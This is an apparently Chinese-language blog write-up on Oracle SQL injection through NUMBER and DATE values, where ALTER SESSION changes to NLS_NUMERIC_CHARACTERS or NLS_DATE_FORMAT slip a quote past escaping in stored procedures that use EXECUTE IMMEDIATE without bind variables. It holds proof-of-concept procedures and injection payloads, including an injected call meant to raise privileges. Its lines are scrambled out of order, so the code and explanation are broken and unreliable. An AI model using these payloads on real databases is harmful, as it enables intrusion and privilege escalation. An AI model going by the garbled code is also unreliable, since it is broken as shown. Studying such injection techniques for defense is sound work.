单引号被转义掉了
is
begin




内部对varchar类型进行替换了！我们可以进行测试

这样就可以间接的攻击它…
SELECT to_number(1000.10001,'999999D99999′)||” FROM DUAL;
ALTER SESSION SET NLS_NUMERIC_CHARACTERS=”'.';
numinjpoc(TO_NUMBER(0.10001,'999999D99999′),'||kj.exp()–');




execute immediate ‘insert into kjdatetable values('|| d ||')';

end;
commit;


begin

只是多了一个单引号，那有什么用呢？乐观的来说！在特定情况下是很有价值的！看以下一个存储过程
SecStr:=replace(kjexpstr,””,”””);

那么遇到以上的存储过程或者函数等，也通过修改SESSION中的NLS_DATE_FORMAT中的值达到SQL注射的目的，
end;


ALTER SESSION SET NLS_NUMERIC_CHARACTERS=”'.';
1000′10001
as
SELECT * FROM DUAL WHERE ID=1000 and name=”'–'

老外的PAPER讲解得非常详细了 ，我在这里也不废话。
numinjpoc(1000,”'–');
end;
begin
commit;
输出一下结果


惟独对于 NUMBER类型的注射没有多作讲解 只是简单演示了可以输出单引号！



sys.dbms_output.put_line('SELECT * FROM DUAL WHERE and name=”'||SecStr||””);
create or replace procedure kjdatepoc(date d)
那么如果我们结合这个NUMBER类型怎么进行注射呢？
根本不需要担心遭受到SQL新型注入攻击，那么在什么地方会发生DATE 以及 NUMBER的注入攻击呢！？一般都是采用了动态SQL而又不采用参数绑定的语句。
begin
在某中程度才来需要ALTER SESSION 配合后，再去攻击系统内部的一些函数或者过程来提升权限。未尝不是一种好的突破思路，但是对于单语句进行SQL注射攻击，以结果为向导的话！这样的方式没多大作为。



end;



SELECT * FROM DUAL WHERE||kj.exp()–'

如以下ORACLE存储过程
begin
create or replace procedure kjdatepoc(date d)


看以下存储过程


end;
例如工程师经常用的DBMS_SQL或者EXECUTE IMMEDIATE
as
insert into kjdatetable values(d);


SecStr varchar2(1000);




create or replace procedure NumInjPoc(kjexpnum number,kjexpstr varchar2)
看看输出结果




看以下语句

如果直接执行SQL语句或者参数绑定则不用担心太多，
其输出SQL语句为